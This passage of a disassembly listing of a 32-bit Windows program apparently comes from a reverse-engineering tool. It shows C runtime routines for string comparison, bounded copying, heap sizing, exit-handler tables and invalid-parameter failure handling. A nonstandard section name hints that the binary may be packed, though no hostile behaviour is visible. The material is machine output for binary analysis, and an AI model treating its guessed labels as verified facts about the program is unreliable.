		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402CB6
; ---------------------------------------------------------------------------

loc_402C9B:				; CODE XREF: sub_402C69+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402C7C
		pop	esi
		pop	ebp
		jmp	sub_402B61
; ---------------------------------------------------------------------------

loc_402CA7:				; CODE XREF: sub_402C69+Cj
		push	esi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402B96
		add	esp, 0Ch

loc_402CB6:				; CODE XREF: sub_402C69+30j
		pop	esi
		pop	ebp
		retn
sub_402C69	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402CB9	proc near		; CODE XREF: sub_402DA9+51p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		push	esi
		push	edi
		jz	loc_402DA2
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402D0B

loc_402CDD:				; CODE XREF: sub_402CB9+57j
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402D01
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402D01:				; CODE XREF: sub_402CB9+3Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_402DA4
; ---------------------------------------------------------------------------

loc_402D0B:				; CODE XREF: sub_402CB9+22j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jz	short loc_402CDD
		mov	esi, 7FFFFFFFh
		cmp	[ebp+arg_8], esi
		jbe	short loc_402D44
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402D40
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402D40:				; CODE XREF: sub_402CB9+7Ej
		mov	eax, esi
		jmp	short loc_402DA4
; ---------------------------------------------------------------------------

loc_402D44:				; CODE XREF: sub_402CB9+61j
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402D69
		push	[ebp+arg_8]
		push	edi
		push	[ebp+arg_0]
		call	sub_405BD0
		add	esp, 0Ch

loc_402D5B:				; CODE XREF: sub_402CB9+E7j
		cmp	[ebp+var_4], bl
		jz	short loc_402DA4
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_402DA4
; ---------------------------------------------------------------------------

loc_402D69:				; CODE XREF: sub_402CB9+91j
					; sub_402CB9+E1j
		mov	eax, [ebp+arg_0]
		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405A0A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405A0A
		add	esp, 10h
		inc	edi
		dec	[ebp+arg_8]
		jz	short loc_402D9C
		cmp	esi, ebx
		jz	short loc_402D9C
		cmp	esi, eax
		jz	short loc_402D69

loc_402D9C:				; CODE XREF: sub_402CB9+D9j
					; sub_402CB9+DDj
		sub	esi, eax
		mov	eax, esi
		jmp	short loc_402D5B
; ---------------------------------------------------------------------------

loc_402DA2:				; CODE XREF: sub_402CB9+Ej
		xor	eax, eax

loc_402DA4:				; CODE XREF: sub_402CB9+4Dj
					; sub_402CB9+89j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_402CB9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402DA9	proc near		; CODE XREF: sub_41A28F+D3p
					; sub_41A45D+176p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_427420, esi
		jnz	short loc_402DF0
		cmp	[ebp+arg_0], esi
		jnz	short loc_402DDB

loc_402DBC:				; CODE XREF: sub_402DA9+35j
					; sub_402DA9+3Ej
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402E02
; ---------------------------------------------------------------------------

loc_402DDB:				; CODE XREF: sub_402DA9+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402DBC
		cmp	[ebp+arg_8], 7FFFFFFFh
		ja	short loc_402DBC
		pop	esi
		pop	ebp
		jmp	sub_405BD0
; ---------------------------------------------------------------------------

loc_402DF0:				; CODE XREF: sub_402DA9+Cj
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402CB9
		add	esp, 10h

loc_402E02:				; CODE XREF: sub_402DA9+30j
		pop	esi
		pop	ebp
		retn
sub_402DA9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402E05	proc near		; CODE XREF: sub_401C1D+1Ep
					; sub_401C1D+40p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_421618
		call	__SEH_prolog4
		xor	eax, eax
		mov	ebx, [ebp+arg_0]
		xor	edi, edi
		cmp	ebx, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_402E3E
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_402E91
; ---------------------------------------------------------------------------

loc_402E3E:				; CODE XREF: sub_402E05+1Aj
		cmp	dword_436454, 3
		jnz	short loc_402E7F
		push	4
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_405ED5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	short loc_402E6B
		mov	esi, [ebx-4]
		sub	esi, 9
		mov	[ebp+var_1C], esi
		jmp	short loc_402E6E
; ---------------------------------------------------------------------------

loc_402E6B:				; CODE XREF: sub_402E05+59j
		mov	esi, [ebp+var_1C]

loc_402E6E:				; CODE XREF: sub_402E05+64j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_402E9F
		cmp	[ebp+var_20], edi
		jnz	short loc_402E8F

loc_402E7F:				; CODE XREF: sub_402E05+40j
		push	ebx
		push	edi
		push	dword_4275A8
		call	ds:dword_41D190	; RtlSizeHeap
		mov	esi, eax

loc_402E8F:				; CODE XREF: sub_402E05+78j
		mov	eax, esi

loc_402E91:				; CODE XREF: sub_402E05+37j
		call	__SEH_epilog4
		retn
sub_402E05	endp


; =============== S U B	R O U T	I N E =======================================



sub_402E97	proc near		; DATA XREF: _1fieagrn:00421630o
		xor	edi, edi
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_402E97	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402E9F	proc near		; CODE XREF: sub_402E05+70p
		push	4
		call	sub_405CCF
		pop	ecx
		retn
sub_402E9F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402EA8	proc near		; CODE XREF: sub_41A690+54p
		jmp	ds:dword_41D194
sub_402EA8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402EAE	proc near		; CODE XREF: sub_40177B+FEp
					; sub_40177B+12Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_402ED9
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_402F58
; ---------------------------------------------------------------------------

loc_402ED9:				; CODE XREF: sub_402EAE+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_402F05
		cmp	esi, ebx
		jnz	short loc_402F05
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_402F57
; ---------------------------------------------------------------------------

loc_402F05:				; CODE XREF: sub_402EAE+34j
					; sub_402EAE+38j
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_402F14
		mov	[ebp+var_1C], ecx

loc_402F14:				; CODE XREF: sub_402EAE+61j
		push	edi
		lea	eax, [ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_8]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_14], 42h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		call	sub_406D87
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_402F56
		dec	[ebp+var_1C]
		js	short loc_402F48
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_402F54
; ---------------------------------------------------------------------------

loc_402F48:				; CODE XREF: sub_402EAE+91j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406B86
		pop	ecx
		pop	ecx

loc_402F54:				; CODE XREF: sub_402EAE+98j
		mov	eax, edi

loc_402F56:				; CODE XREF: sub_402EAE+8Cj
		pop	edi

loc_402F57:				; CODE XREF: sub_402EAE+55j
		pop	esi

loc_402F58:				; CODE XREF: sub_402EAE+29j
		pop	ebx
		leave
		retn
sub_402EAE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402F5B	proc near		; CODE XREF: sub_401C1D+CFp
					; sub_417776+15Fp ...
		jmp	sub_40332D
sub_402F5B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402F60	proc near		; CODE XREF: sub_40101C+Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		push	esi
		push	edi
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_402FB5
		cmp	[ebp+arg_0], edi
		jnz	short loc_402F8E

loc_402F73:				; CODE XREF: sub_402F60+31j
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_402F7D:				; CODE XREF: sub_402F60+44j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_402FB7
; ---------------------------------------------------------------------------

loc_402F8E:				; CODE XREF: sub_402F60+11j
		cmp	[ebp+arg_8], edi
		jz	short loc_402F73
		cmp	[ebp+arg_4], eax
		jnb	short loc_402FA6
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_402F7D
; ---------------------------------------------------------------------------

loc_402FA6:				; CODE XREF: sub_402F60+36j
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_407720
		add	esp, 0Ch

loc_402FB5:				; CODE XREF: sub_402F60+Cj
		xor	eax, eax

loc_402FB7:				; CODE XREF: sub_402F60+2Cj
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_402F60	endp


; =============== S U B	R O U T	I N E =======================================



sub_402FBB	proc near		; CODE XREF: sub_401065+11p
		mov	eax, ecx
		and	dword ptr [eax+4], 0
		and	dword ptr [eax+8], 0
		mov	dword ptr [eax], offset	off_41D37C
		retn
sub_402FBB	endp


; =============== S U B	R O U T	I N E =======================================



sub_402FCC	proc near		; CODE XREF: sub_4015ED+2Fp
					; sub_40BDB6+15Dp

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		push	edi
		mov	edi, ecx
		mov	dword ptr [edi], offset	off_41D37C
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_403007
		push	eax
		call	sub_4044E0
		mov	esi, eax
		inc	esi
		push	esi
		call	sub_403AA0
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi+4], eax
		jz	short loc_40300B
		push	dword ptr [ebx]
		push	esi
		push	eax
		call	sub_407A85
		add	esp, 0Ch
		jmp	short loc_40300B
; ---------------------------------------------------------------------------

loc_403007:				; CODE XREF: sub_402FCC+13j
		and	dword ptr [edi+4], 0

loc_40300B:				; CODE XREF: sub_402FCC+2Bj
					; sub_402FCC+39j
		mov	dword ptr [edi+8], 1
		mov	eax, edi
		pop	edi
		pop	esi
		pop	ebx
		retn	4
sub_402FCC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40301A	proc near		; CODE XREF: sub_4033F2+Ap

arg_0		= dword	ptr  4

		mov	eax, ecx
		mov	ecx, [esp+arg_0]
		mov	dword ptr [eax], offset	off_41D37C
		mov	ecx, [ecx]
		and	dword ptr [eax+8], 0
		mov	[eax+4], ecx
		retn	8
sub_40301A	endp


; =============== S U B	R O U T	I N E =======================================



sub_403032	proc near		; CODE XREF: sub_4013E6+15p
					; sub_4015ED+51p ...

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41D37C
		mov	eax, [ebx+8]
		mov	[esi+8], eax
		test	eax, eax
		mov	eax, [ebx+4]
		push	edi
		jz	short loc_40307F
		test	eax, eax
		jz	short loc_403079
		push	eax
		call	sub_4044E0
		mov	edi, eax
		inc	edi
		push	edi
		call	sub_403AA0
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[esi+4], eax
		jz	short loc_403082
		push	dword ptr [ebx+4]
		push	edi
		push	eax
		call	sub_407A85
		add	esp, 0Ch
		jmp	short loc_403082
; ---------------------------------------------------------------------------

loc_403079:				; CODE XREF: sub_403032+1Ej
		and	dword ptr [esi+4], 0
		jmp	short loc_403082
; ---------------------------------------------------------------------------

loc_40307F:				; CODE XREF: sub_403032+1Aj
		mov	[esi+4], eax

loc_403082:				; CODE XREF: sub_403032+36j
					; sub_403032+45j ...
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		retn	4
sub_403032	endp


; =============== S U B	R O U T	I N E =======================================



sub_40308A	proc near		; CODE XREF: sub_401038+6j
					; .text:0040104Cp ...
		cmp	dword ptr [ecx+8], 0
		mov	dword ptr [ecx], offset	off_41D37C
		jz	short locret_40309F
		push	dword ptr [ecx+4]
		call	sub_4039C3
		pop	ecx

locret_40309F:				; CODE XREF: sub_40308A+Aj
		retn
sub_40308A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4030A0	proc near		; DATA XREF: _1fieagrn:0041D328o
					; _1fieagrn:0041D380o ...
		mov	eax, [ecx+4]
		test	eax, eax
		jnz	short locret_4030AC
		mov	eax, offset aUnknownExcepti ; "Unknown exception"

locret_4030AC:				; CODE XREF: sub_4030A0+5j
		retn
sub_4030A0	endp

; ---------------------------------------------------------------------------

loc_4030AD:				; DATA XREF: _1fieagrn:off_41D37Co
		push	esi
		mov	esi, ecx
		call	sub_40308A
		test	byte ptr [esp+8], 1
		jz	short loc_4030C3
		push	esi
		call	sub_40332D
		pop	ecx

loc_4030C3:				; CODE XREF: .text:004030BAj
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4030C9	proc near		; CODE XREF: sub_4031A5+18p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	dword_436430
		call	sub_405543
		push	dword_43642C
		mov	esi, eax
		mov	[esp+1Ch+var_4], esi
		call	sub_405543
		mov	edi, eax
		cmp	edi, esi
		pop	ecx
		pop	ecx
		jb	short loc_40316E
		mov	ebx, edi
		sub	ebx, esi
		lea	ebp, [ebx+4]
		cmp	ebp, 4
		jb	short loc_40316E
		push	esi
		call	sub_402E05
		mov	esi, eax
		cmp	esi, ebp
		pop	ecx
		jnb	short loc_403155
		mov	eax, 800h
		cmp	esi, eax
		jnb	short loc_403116
		mov	eax, esi

loc_403116:				; CODE XREF: sub_4030C9+49j
		add	eax, esi
		cmp	eax, esi
		jb	short loc_40312C
		push	eax
		push	[esp+18h+var_4]
		call	sub_407B72
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_403143

loc_40312C:				; CODE XREF: sub_4030C9+51j
		lea	eax, [esi+10h]
		cmp	eax, esi
		jb	short loc_40316E
		push	eax
		push	[esp+18h+var_4]
		call	sub_407B72
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40316E

loc_403143:				; CODE XREF: sub_4030C9+61j
		sar	ebx, 2
		push	eax
		lea	edi, [eax+ebx*4]
		call	sub_4054D7
		pop	ecx
		mov	dword_436430, eax

loc_403155:				; CODE XREF: sub_4030C9+40j
		mov	esi, [esp+14h+arg_0]
		mov	[edi], esi
		add	edi, 4
		push	edi
		call	sub_4054D7
		mov	dword_43642C, eax
		pop	ecx
		mov	eax, esi
		jmp	short loc_403170
; ---------------------------------------------------------------------------

loc_40316E:				; CODE XREF: sub_4030C9+27j
					; sub_4030C9+33j ...
		xor	eax, eax

loc_403170:				; CODE XREF: sub_4030C9+A3j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn
sub_4030C9	endp


; =============== S U B	R O U T	I N E =======================================



sub_403176	proc near		; DATA XREF: _1fieagrn:0041D2D4o
		push	esi
		push	4
		push	20h
		call	sub_407B2A
		mov	esi, eax
		push	esi
		call	sub_4054D7
		add	esp, 0Ch
		test	esi, esi
		mov	dword_436430, eax
		mov	dword_43642C, eax
		jnz	short loc_40319E
		push	18h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40319E:				; CODE XREF: sub_403176+21j
		and	dword ptr [esi], 0
		xor	eax, eax
		pop	esi
		retn
sub_403176	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4031A5	proc near		; CODE XREF: sub_4031E1+4p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_421638
		call	__SEH_prolog4
		call	sub_407C6C
		and	[ebp+ms_exc.disabled], 0
		push	[ebp+arg_0]
		call	sub_4030C9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4031DB
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_4031A5	endp


; =============== S U B	R O U T	I N E =======================================



sub_4031DB	proc near		; CODE XREF: sub_4031A5+28p
					; DATA XREF: _1fieagrn:00421650o
		call	sub_407C75
		retn
sub_4031DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4031E1	proc near		; CODE XREF: sub_40340B+45p
					; sub_407D29+44p ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_4031A5
		neg	eax
		sbb	eax, eax
		neg	eax
		pop	ecx
		dec	eax
		retn
sub_4031E1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4031F3	proc near		; CODE XREF: sub_407EC9+15p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_4270C0, eax
		retn
sub_4031F3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_4031FD	proc near		; CODE XREF: sub_4032F9+1Fj
					; sub_405DD8+21p ...

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		push	esi
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_407F20
		lea	eax, [ebp+2A8h+var_328]
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_328], 0C000000Dh
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:off_41D08C
		push	0
		mov	esi, eax
		call	ds:dword_41D19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
		call	ds:off_41D198
		test	eax, eax
		jnz	short loc_4032D1
		test	esi, esi
		jnz	short loc_4032D1
		push	2
		call	sub_407F15
		pop	ecx

loc_4032D1:				; CODE XREF: sub_4031FD+C6j
					; sub_4031FD+CAj
		push	0C000000Dh
		call	ds:dword_41D0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41D0F4
		mov	ecx, [ebp+2A8h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		add	ebp, 2A8h
		leave
		retn
sub_4031FD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4032F9	proc near		; CODE XREF: sub_402B96+29p
					; sub_402B96+5Fp ...
		push	ebp
		mov	ebp, esp
		push	dword_4270C0
		call	sub_405543
		test	eax, eax
		pop	ecx
		jz	short loc_40330F
		pop	ebp
		jmp	eax
; ---------------------------------------------------------------------------

loc_40330F:				; CODE XREF: sub_4032F9+11j
		push	2
		call	sub_407F15
		pop	ecx
		pop	ebp
		jmp	sub_4031FD
sub_4032F9	endp


; =============== S U B	R O U T	I N E =======================================



sub_40331D	proc near		; CODE XREF: sub_40164F+5p
					; sub_40164F+14p ...
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4032F9
		add	esp, 14h
		retn
sub_40331D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_40332D	proc near		; CODE XREF: .text:00401059p
					; .text:004010D5p ...
		jmp	sub_4039C3
sub_40332D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403332	proc near		; CODE XREF: sub_401000+Fp
					; sub_403EE2+84p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_C]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_403344

loc_403340:				; CODE XREF: sub_403332+4Bj
		xor	eax, eax
		jmp	short loc_4033A9
; ---------------------------------------------------------------------------

loc_403344:				; CODE XREF: sub_403332+Cj
		cmp	[ebp+arg_0], edi
		jnz	short loc_403364

loc_403349:				; CODE XREF: sub_403332+5Fj
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_403353:				; CODE XREF: sub_403332+72j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_4033A9
; ---------------------------------------------------------------------------

loc_403364:				; CODE XREF: sub_403332+15j
		cmp	[ebp+arg_8], edi
		jz	short loc_40337F
		cmp	[ebp+arg_4], esi
		jb	short loc_40337F
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_407FA0
		add	esp, 0Ch
		jmp	short loc_403340
; ---------------------------------------------------------------------------

loc_40337F:				; CODE XREF: sub_403332+35j
					; sub_403332+3Aj
		push	[ebp+arg_4]
		push	edi
		push	[ebp+arg_0]
		call	sub_407F20
		add	esp, 0Ch
		cmp	[ebp+arg_8], edi
		jz	short loc_403349
		cmp	[ebp+arg_4], esi
		jnb	short loc_4033A6
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_403353
; ---------------------------------------------------------------------------

loc_4033A6:				; CODE XREF: sub_403332+64j
		push	16h
		pop	eax

loc_4033A9:				; CODE XREF: sub_403332+10j
					; sub_403332+30j
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_403332	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033AD	proc near		; CODE XREF: .text:004033BEp
		push	ecx
		mov	dword ptr [ecx], offset	off_41D39C
		call	sub_408305
		pop	ecx
		retn
sub_4033AD	endp

; ---------------------------------------------------------------------------

loc_4033BB:				; DATA XREF: _1fieagrn:off_41D39Co
		push	esi
		mov	esi, ecx
		call	sub_4033AD
		test	byte ptr [esp+8], 1
		jz	short loc_4033D1
		push	esi
		call	sub_40332D
		pop	ecx

loc_4033D1:				; CODE XREF: .text:004033C8j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4033D7	proc near		; CODE XREF: sub_40BDB6+12Dp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		add	ecx, 9
		push	ecx
		add	eax, 9
		push	eax
		call	sub_408380
		neg	eax
		pop	ecx
		sbb	eax, eax
		pop	ecx
		inc	eax
		retn	4
sub_4033D7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033F2	proc near		; CODE XREF: sub_40340B+3Bp
		push	esi
		push	1
		push	offset off_423048
		mov	esi, ecx
		call	sub_40301A
		mov	dword ptr [esi], offset	off_41D324
		mov	eax, esi
		pop	esi
		retn
sub_4033F2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40340B	proc near		; CODE XREF: sub_401291+5p
					; sub_401395+5p ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		jmp	short loc_403420
; ---------------------------------------------------------------------------

loc_403413:				; CODE XREF: sub_40340B+20j
		push	[ebp+arg_0]
		call	sub_408412
		test	eax, eax
		pop	ecx
		jz	short loc_40342F

loc_403420:				; CODE XREF: sub_40340B+6j
		push	[ebp+arg_0]
		call	sub_403AA0
		test	eax, eax
		pop	ecx
		jz	short loc_403413
		leave
		retn
; ---------------------------------------------------------------------------

loc_40342F:				; CODE XREF: sub_40340B+13j
		test	byte ptr dword_4270D0, 1
		mov	esi, offset dword_4270C4
		jnz	short loc_403456
		or	dword_4270D0, 1
		mov	ecx, esi
		call	sub_4033F2
		push	offset loc_41CD31
		call	sub_4031E1
		pop	ecx

loc_403456:				; CODE XREF: sub_40340B+30j
		push	esi
		lea	ecx, [ebp+var_C]
		call	sub_403032
		push	offset dword_421CD0
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41D324
		call	sub_40456B
		int	3		; Trap to Debugger
sub_40340B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403475	proc near		; CODE XREF: sub_4198AD+84p
					; sub_4198AD+102p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_4], ebx
		jnz	short loc_4034A0

loc_403483:				; CODE XREF: sub_403475+30j
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4034ED
; ---------------------------------------------------------------------------

loc_4034A0:				; CODE XREF: sub_403475+Cj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_403483
		push	esi
		mov	[ebp+var_18], eax
		mov	[ebp+var_20], eax
		lea	eax, [ebp+arg_8]
		push	eax
